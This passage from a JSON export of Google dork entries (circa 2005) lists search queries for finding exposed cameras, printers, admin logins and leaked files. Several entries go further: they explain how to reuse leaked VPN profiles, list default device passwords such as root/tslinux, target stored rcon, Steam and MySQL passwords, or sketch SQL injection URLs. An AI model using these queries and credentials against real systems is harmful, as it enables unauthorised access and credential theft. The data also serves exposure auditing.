While this requires authentication, sometimes overly revealing error messages are returned.", "submited": "2005-04-27", "request": "intitle:\"Zope Help System\" inurl:HelpSys", "id": 948}, {"short description": "ext:jbf jbf", "long description": "There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file.", "submited": "2005-04-27", "request": "ext:jbf jbf", "id": 949}, {"short description": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "long description": "A search for some HTML code used in a variety of D-link network devices (webcams and such).", "submited": "2005-04-27", "request": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "id": 950}, {"short description": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "long description": "Just another logon page search, this one is for SFX, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library.", "submited": "2005-04-27", "request": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "id": 951}, {"short description": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "long description": "Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache.", "submited": "2005-04-27", "request": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "id": 952}, {"short description": "inurl:cgi-bin inurl:bigate.cgi", "long description": "Anonymous surfing with bigate.cgi. 
Remove http:// when you copy paste or it won't work.", "submited": "2005-04-27", "request": "inurl:cgi-bin inurl:bigate.cgi", "id": 953}, {"short description": "ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"", "long description": "Various Online Devices>Xerox (*Centre)", "submited": "2005-05-02", "request": "ext:dhtml intitle:\"document centre|(home)\" OR intitle:\"xerox\"", "id": 954}, {"short description": "ext:DBF DBF", "long description": "Dbase DAtabase file. Can contain sensitive data like any other database.", "submited": "2005-04-27", "request": "ext:DBF DBF", "id": 955}, {"short description": "ext:CDX CDX", "long description": "Visual FoxPro database index", "submited": "2005-04-27", "request": "ext:CDX CDX", "id": 956}, {"short description": "ext:ccm ccm -catacomb", "long description": "Lotus cc:Mail Mailbox file", "submited": "2005-04-27", "request": "ext:ccm ccm -catacomb", "id": 957}, {"short description": "ext:DCA DCA", "long description": "IBM DisplayWrite Document Content Architecture Text File", "submited": "2005-04-27", "request": "ext:DCA DCA", "id": 958}, {"short description": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "long description": "squid error messages, most likely from reverse proxy servers.", "submited": "2005-04-27", "request": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "id": 959}, {"short description": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "long description": "some people actually keep their VPN profiles on the internet...omg... 
Simply donwload the pcf file, import it in your Cisco VPN client and try to connect", "submited": "2005-05-02", "request": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "id": 960}, {"short description": "intitle:\"Welcome To Your WebSTAR Home Page\"", "long description": "This is the default page for the WebSTAR (Macintosh) web server (Headers say --> Server: WebSTAR NetCloak).", "submited": "2005-05-02", "request": "intitle:\"Welcome To Your WebSTAR Home Page\"", "id": 961}, {"short description": "\"Powered by DWMail\" password intitle:dwmail", "long description": "What is DWmail?: DWmail is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email.", "submited": "2005-05-02", "request": "\"Powered by DWMail\" password intitle:dwmail", "id": 962}, {"short description": "inurl:gnatsweb.pl", "long description": "GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases.", "submited": "2005-05-02", "request": "inurl:gnatsweb.pl", "id": 963}, {"short description": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "long description": "Real Estate software package, with the admin login screen", "submited": "2005-05-02", "request": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "id": 964}, {"short description": "intitle:\"YALA: Yet Another LDAP Administrator\"", "long description": "YALA is a web-based LDAP administration GUI. 
The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server", "submited": "2005-05-02", "request": "intitle:\"YALA: Yet Another LDAP Administrator\"", "id": 965}, {"short description": "intitle:open-xchange inurl:login.pl", "long description": "Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. 
Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities.", "submited": "2005-05-02", "request": "intitle:open-xchange inurl:login.pl", "id": 966}, {"short description": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "long description": "IBM Http Server (AS/400)", "submited": "2005-05-02", "request": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "id": 967}, {"short description": "intitle:\"WorldClient\" intext:\" (2003|2004) Alt-N Technologies.\"", "long description": "MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs.", "submited": "2005-05-02", "request": "intitle:\"WorldClient\" intext:\" (2003|2004) Alt-N Technologies.\"", "id": 968}, {"short description": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "long description": "Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. 
some guys from freifunk.net have modified it for their needs.", "submited": "2005-05-02", "request": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "id": 969}, {"short description": "intitle:index.of WEB-INF", "long description": "Finds java powered web servers which have indexing enabled on their config directory", "submited": "2005-05-02", "request": "intitle:index.of WEB-INF", "id": 970}, {"short description": "inurl:\"port_255\" -htm", "long description": "Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177", "submited": "2005-05-02", "request": "inurl:\"port_255\" -htm", "id": 971}, {"short description": "intitle:\"SWW link\" \"Please wait.....\"", "long description": "Zyxel Zywall", "submited": "2005-05-02", "request": "intitle:\"SWW link\" \"Please wait.....\"", "id": 972}, {"short description": "intitle:\"InterJak Web Manager\"", "long description": "A router device by Uroam (formerly FilaNet), with email and VPN possibilities.", "submited": "2005-05-20", "request": "intitle:\"InterJak Web Manager\"", "id": 973}, {"short description": "inurl:server.cfg rcon password", "long description": "Counter strike rcon passwords, saved in the server.cfg.", "submited": "2005-05-06", "request": "inurl:server.cfg rcon password", "id": 974}, {"short description": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "long description": "myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507", "submited": "2005-05-07", "request": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "id": 975}, {"short description": "intext:\"powered by EZGuestbook\"", "long description": "HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. 
Remote users may download the database http://www.securityfocus.com/bid/13543/info/", "submited": "2005-05-11", "request": "intext:\"powered by EZGuestbook\"", "id": 976}, {"short description": "inurl::2082/frontend -demo", "long description": "This allows you access to CPanel login dialogues/screens.", "submited": "2005-05-11", "request": "inurl::2082/frontend -demo", "id": 977}, {"short description": "intitle:\"osTicket :: Support Ticket System\"", "long description": "osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882", "submited": "2005-05-14", "request": "intitle:\"osTicket :: Support Ticket System\"", "id": 978}, {"short description": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "long description": "Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). 
This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low.", "submited": "2005-05-14", "request": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "id": 979}, {"short description": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time & Any where\" username password", "long description": "AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server.", "submited": "2005-05-14", "request": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time & Any where\" username password", "id": 980}, {"short description": "inurl:start.htm?scrw=", "long description": "VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)", "submited": "2005-05-14", "request": "inurl:start.htm?scrw=", "id": 981}, {"short description": "intitle:\"Welcome to 602LAN SUITE *\"", "long description": "The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail.", "submited": "2005-05-20", "request": "intitle:\"Welcome to 602LAN SUITE *\"", "id": 982}, {"short description": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "long description": "simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. 
Critical Information dislosures http://www.securityfocus.com/archive/1/395994", "submited": "2005-05-30", "request": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "id": 983}, {"short description": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com", "long description": "sSHTerm Applet en SSHVnc Applet pages.", "submited": "2005-05-20", "request": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\"", "id": 984}, {"short description": "\"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!\" -site:webblernet.nl -site:ihackstuff.com -sit", "long description": "speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now.", "submited": "2005-05-20", "request": "\"To view the Web interface of the SpeedTouch, Java", "id": 985}, {"short description": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "long description": "A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance.", "submited": "2005-05-30", "request": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "id": 986}, {"short description": "intitle:\"Dell *\" inurl:port_0", "long description": "oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. 
(Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)", "submited": "2005-05-31", "request": "intitle:\"Dell *\" inurl:port_0", "id": 987}, {"short description": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "long description": "Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. 
This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html", "submited": "2005-05-29", "request": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "id": 988}, {"short description": "intitle:\"PacketShaper Customer Login\"", "long description": "PacketShaper Login.Provides login access for PacketShaper Customers.", "submited": "2005-05-19", "request": "intitle:\"PacketShaper Customer Login\"", "id": 989}, {"short description": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "long description": "Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet.", "submited": "2005-05-20", "request": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "id": 990}, {"short description": "inurl:Citrix/MetaFrame/default/default.aspx", "long description": "MetaFrame Presentation Server", "submited": "2005-05-15", "request": "inurl:Citrix/MetaFrame/default/default.aspx", "id": 991}, {"short description": "inurl:exchweb/bin/auth/owalogon.asp", "long description": "Outlook Web Access Login POrtal", "submited": "2005-05-15", "request": "inurl:exchweb/bin/auth/owalogon.asp", "id": 992}, {"short description": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "long description": "Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. 
If you successfully login to that server you can possibly compromise all the other network servers.", "submited": "2005-05-23", "request": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "id": 993}, {"short description": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "long description": "Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections.", "submited": "2005-06-03", "request": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "id": 994}, {"short description": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "long description": "VisNetic WebMail is a built-in web mail server that allows VisNetic Mail Server account holders to access their email messages, folders and address books from any standard web browser on an Internet enabled computer.", "submited": "2005-06-06", "request": "intitle:\"VisNetic WebMail\" inurl:\"/mail/\"", "id": 995}, {"short description": "inurl:perform.ini filetype:ini", "long description": "mIRC Passwords For Nicks & Channels in channel\\[chanfolder] section of mirc.ini you can find 2 type of \"private\" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)", "submited": "2005-06-06", "request": "inurl:perform.ini filetype:ini", "id": 996}, {"short description": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "long description": "Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose.", "submited": "2005-06-01", "request": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "id": 997}, {"short description": "allintitle:\"Welcome to the Cyclades\"", "long description": "This search reveals the login page for the Cyclades TS1000 and TS2000 Web Management Service. 
The Cyclades TS1000 and TS200 devices are Console servers, based on a cut down Linux version. These lovely devices sit on the network with console cables attached to them, so that you then gain access to this device, and then have console access to any of the hosts connected to the console ports. :-)The default username and password for these devices is, root/tslinux.This query currently only returns pages available in Google's cache (but in the future more devices may be returned).", "submited": "2005-06-02", "request": "allintitle:\"Welcome to the Cyclades\"", "id": 998}, {"short description": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "long description": "This query reveals login pages for the administration of XcAuction and XcClassified Lite..\"XcAuction is a powerful and complete auction package that allows you to add auction capabilities to any web site.\"\"XcClassified allows you to offer free or fee based classified ads to your site visitors. It integrates easily into your existing web site design and offers many features.\"", "submited": "2005-06-07", "request": "intitle:\"XcAuctionLite\" | \"DRIVEN BY XCENT\" Lite inurl:admin", "id": 999}, {"short description": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "long description": "X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information.", "submited": "2005-06-03", "request": "intext:\"Powered by X-Cart: shopping cart software\" -site:x-cart.com", "id": 1000}, {"short description": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \" | \"PowerDownload v3.0.3 \" ) -site:powerscripts.org", "long description": "The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. 
Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 & v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt", "submited": "2005-06-03", "request": "intitle:\"PowerDownload\" (\"PowerDownload v3.0.2 \" | \"PowerDownload v3.0.3 \" ) -site:powerscripts.org", "id": 1001}, {"short description": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "long description": "Phpstat shows nice statistical informatino about a website's visitors. Certain versions are also contain vulnerabilities: http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt", "submited": "2005-06-03", "request": "intitle:\"PHPstat\" intext:\"Browser\" intext:\"PHPstat setup\"", "id": 1002}, {"short description": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "long description": "Vulnerability has been found in parameter \"id\". If this variableAny value it is possible to replace it with a sign ' is transferredSince this parameter is involved in all modules, all of them Are vulnerable.It occurs because of absence of a filtration of parameter id. Exampleshttp://example/index.php?affiche=News&id='[SQL inj]http://example/index.php?affiche=File&id='[SQL inj]http://example/index.php?affiche=Liens&id='[SQL inj]http://example/index.php?affiche=Faq&id='[SQL inj]The conclusionVulnerability is found out in version 1.3, on other versionsDid not check. Probably they too are vulnerable.", "submited": "2005-06-03", "request": "\"portailphp v1.3\" inurl:\"index.php?affiche\" inurl:\"PortailPHP\" -site:safari-msi.com", "id": 1003}, {"short description": "+intext:\"powered by MyBulletinBoard\"", "long description": "MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. 
There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)", "submited": "2005-06-03", "request": "+intext:\"powered by MyBulletinBoard\"", "id": 1004}, {"short description": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mobile\"", "long description": "Mobile cameras? Not sure what camera type this is for but they are all from Asia and no password is required to view them.. multiple cams and camera views. The &N=* at the end of the URL changes the language of the camera control links, &N=0 is english.This is a slightly modified version of WarChylde's query, which gives more results.", "submited": "2005-06-07", "request": "inurl:\"S=320x240\" | inurl:\"S=160x120\" inurl:\"Q=Mob", "id": 1005}, {"short description": "inurl:XcCDONTS.asp", "long description": "This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!", "submited": "2005-06-07", "request": "inurl:XcCDONTS.asp", "id": 1006}, {"short description": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "long description": "This will search for usernames and passwords for steam (www.steampowered.com) taken from the SteamApp.cfg file.", "submited": "2005-06-05", "request": "intext:\"SteamUserPassphrase=\" intext:\"SteamAppUser=\" -\"username\" -\"user\"", "id": 1007}, {"short description": "inurl:\"CgiStart?page=\"", "long description": "This search reveals even more Panasonic IP cameras!", "submited": "2005-06-08", "request": "inurl:\"CgiStart?page=\"", "id": 1008}, {"short description": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "long description": "Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system 
information.If the \"/flatnuke/foot_news.php\" script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the \"image\" parameter in the \"thumb.php\" script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.", "submited": "2005-06-10", "request": "intext:\"Powered by flatnuke-2.5.3\" +\"Get RSS News\" -demo", "id": 1009}, {"short description": "inurl:pass.dat", "long description": "Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not", "submited": "2005-06-04", "request": "filetype:dat inurl:pass.dat", "id": 1010}, {"short description": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "long description": "This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details", "submited": "2005-06-05", "request": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "id": 1011}, {"short description": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "long description": "This will look throught default phpinfo pages for ones that have a default mysql password.", "submited": "2005-06-05", "request": "intitle:\"phpinfo()\" +\"mysql.default_password\" +\"Zend Scripting Language Engine\"", "id": 1012}, {"short description": "intitle:\"configuration\" inurl:port_0", "long description": "More dell and lexmark printers, The usual things included.", "submited": "2005-06-07", "request": "intitle:\"configuration\" inurl:port_0", "id": 1013}, {"short description": "intitle:\"Dell Laser 
Printer M5200\" port_0", "long description": "Dell Laser Printer M5200", "submited": "2005-06-07", "request": "intitle:\"Dell Laser Printer M5200\" port_0", "id": 1014}, {"short description": "printers/printman.html", "long description": "some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses.", "submited": "2005-06-07", "request": "printers/printman.html", "id": 1015}, {"short description": "\"RICOH Network Printer D model-Restore Factory\"", "long description": "Not a whole lot here.", "submited": "2005-06-07", "request": "\"RICOH Network Printer D model-Restore Factory\"", "id": 1016}, {"short description": "intitle:\"GCC WebAdmin\" -gcc.ru", "long description": "All sorts of various printer status information", "submited": "2005-06-08", "request": "intitle:\"GCC WebAdmin\" -gcc.ru", "id": 1017}, {"short description": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "long description": "This search will find the Web Administration Interface for servers running XMail.\"XMail is an Internet and intranet mail server featuring an SMTP server, POP3 server, finger server, multiple domains, no need for users to have a real system account, SMTP relay checking\", etc...", "submited": "2005-06-09", "request": "intitle:\"XMail Web Administration Interface\" intext:Login intext:password", "id": 1018}, {"short description": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "long description": "This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based.", "submited": "2005-06-10", "request": "intitle:\"AXIS 240 Camera Server\" intext:\"server push\" -help", "id": 1019}, {"short description": "\"html allowed\" guestbook", 
"long description": "When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like or adding a loop javascript pop-up", "submited": "2005-06-11", "request": "\"html allowed\" guestbook", "id": 1020}, {"short description": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "long description": "snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well.", "submited": "2005-06-21", "request": "intext:\"Powered By: Snitz Forums 2000 Version 3.4.00..03\"", "id": 1021}, {"short description": "filetype:QBW qbw", "long description": "Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. 
This could lead to identity theft, or worse...", "submited": "2005-06-21", "request": "filetype:QBW qbw", "id": 1022}, {"short description": "inurl:cgi-bin inurl:calendar.cfg", "long description": "CGI Calendar (Perl) configuration file reveals information including passwords for the program.", "submited": "2005-06-24", "request": "inurl:cgi-bin inurl:calendar.cfg", "id": 1023}, {"short description": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "long description": "i-Gallery 3.3 (and possibly older) is vulnerable to many things, including /../ traversals.http://www.packetstormsecurity.org/0506-exploits/igallery33.txt", "submited": "2005-06-24", "request": "inurl:\"/login.asp?folder=\" \"Powered by: i-Gallery 3.3\"", "id": 1024}, {"short description": "intext:\"Calendar Program Copyright 1999 Matt Kruse\" \"Add an event\"", "long description": "This search finds all pages that allow you to add events in Mark Kruse's CalendarScript. This script seems to be VERY vulnerable to HTML injection techniques.", "submited": "2005-06-24", "request": "intext:\"Calendar Program Copyright 1999 Matt Kruse\" \"Add an event\"", "id": 1025}, {"short description": "intitle:\"Login to Cacti\"", "long description": "Cacti is a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", "submited": "2005-06-24", "request": "intitle:\"Login to Cacti\"", "id": 1026}, {"short description": "\"set up the administrator user\" inurl:pivot", "long description": "Using this, you can find sites with a Pivot weblog installed but not set up. 
The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog.", "submited": "2005-07-03", "request": "\"set up the administrator user\" inurl:pivot", "id": 1027}, {"short description": "inurl:textpattern/index.php", "long description": "Login portal for textpattern a CMS/Blogger tool.", "submited": "2005-06-09", "request": "inurl:textpattern/index.php", "id": 1028}, {"short description": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "long description": "A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!", "submited": "2005-07-07", "request": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "id": 1029}, {"short description": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "long description": "Another php vulnerabilty, as seen here http://www.frsirt.com/exploits/20050704.phpbbSecureD.pl.phpphpBB 2.0.15 Viewtopic.PHP Remote Code Execution VulnerabilityThis exploit gives the user all the details about the databaseconnection such as database host, username, password anddatabase name.", "submited": "2005-07-08", "request": "\"powered by PhpBB 2.0.15\" -site:phpbb.com", "id": 1030}, {"short description": "filetype:PS ps", "long description": "PS is for \"postscript\"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff.", "submited": "2005-07-08", "request": "filetype:PS ps", "id": 1031}, {"short description": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "long description": "BackgroundEasySite is a Content Management System (CMS) build on PHP and MySQL. 
Many easysite servers still use the default username and password, however all of them have been contacted about this problem.", "submited": "2005-07-20", "request": "\"You have requested access to a restricted area of our website. Please authenticate yourself to continue.\"", "id": 1032}, {"short description": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "long description": "This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on.", "submited": "2005-07-21", "request": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "id": 1033}, {"short description": "allinurl:cdkey.txt", "long description": "cdkeys", "submited": "2005-07-21", "request": "allinurl:cdkey.txt", "id": 1034}, {"short description": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "long description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.", "submited": "2005-07-22", "request": "intitle:\"TANDBERG\" \"This page requires a frame capable browser!\"", "id": 1035}, {"short description": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "long description": "Tandberg is a manufacturer of videoconferencing A videoconference (also known as a video teleconference) is a meeting among persons where both telephony and closed circuit television technologies are utilized simultaneously.", "submited": "2005-07-22", "request": "intitle:\"Middle frame of Videoconference Management System\" ext:htm", "id": 1036}, {"short description": "intitle:\"Veo Observer 
Web Client\"", "long description": "Another online camera search. This one uses ActiveX thingies, so you need a M$ browser. Append \"LGI_en.htm\" to the URL for the english version. The embedded webserver is called Ubicom/1.1. Defaults are admin/password. The manual very cleary warns owners to change that.", "submited": "2005-07-22", "request": "intitle:\"Veo Observer Web Client\"", "id": 1037}, {"short description": "intitle:\"TOPdesk ApplicationServer\"", "long description": "Topdesk is some kind of incident ticket system with a webinterface. It requires: Windows 98 and Windows NT, Windows 2000, Windows XP, OS/2. It installs a webserver called: Jetty/4.2.2 and the default password (operator login) is admin/admin. The HTTP server header reveals the OS it's running on.", "submited": "2005-07-22", "request": "intitle:\"TOPdesk ApplicationServer\"", "id": 1038}, {"short description": "intitle:\"Welcome to Mailtraq WebMail\"", "long description": "Mailtraq WebMail is just another a web-based e-mail client. This is the login page.", "submited": "2005-07-22", "request": "intitle:\"Welcome to Mailtraq WebMail\"", "id": 1039}, {"short description": "intitle:\"Java Applet Page\" inurl:ml", "long description": "Another Standalone Network Camera.Default Login: remove wg_jwebeye.ml to get a nice clue ..Server: wg_httpd/1.0(based Boa/0.92q)", "submited": "2005-07-22", "request": "intitle:\"Java Applet Page\" inurl:ml", "id": 1040}, {"short description": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "long description": "DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify.", "submited": "2005-07-22", "request": "intitle:\"WEBDVR\" -inurl:product -inurl:demo", "id": 1041}, {"short description": "\"This section is for Administrators only. 
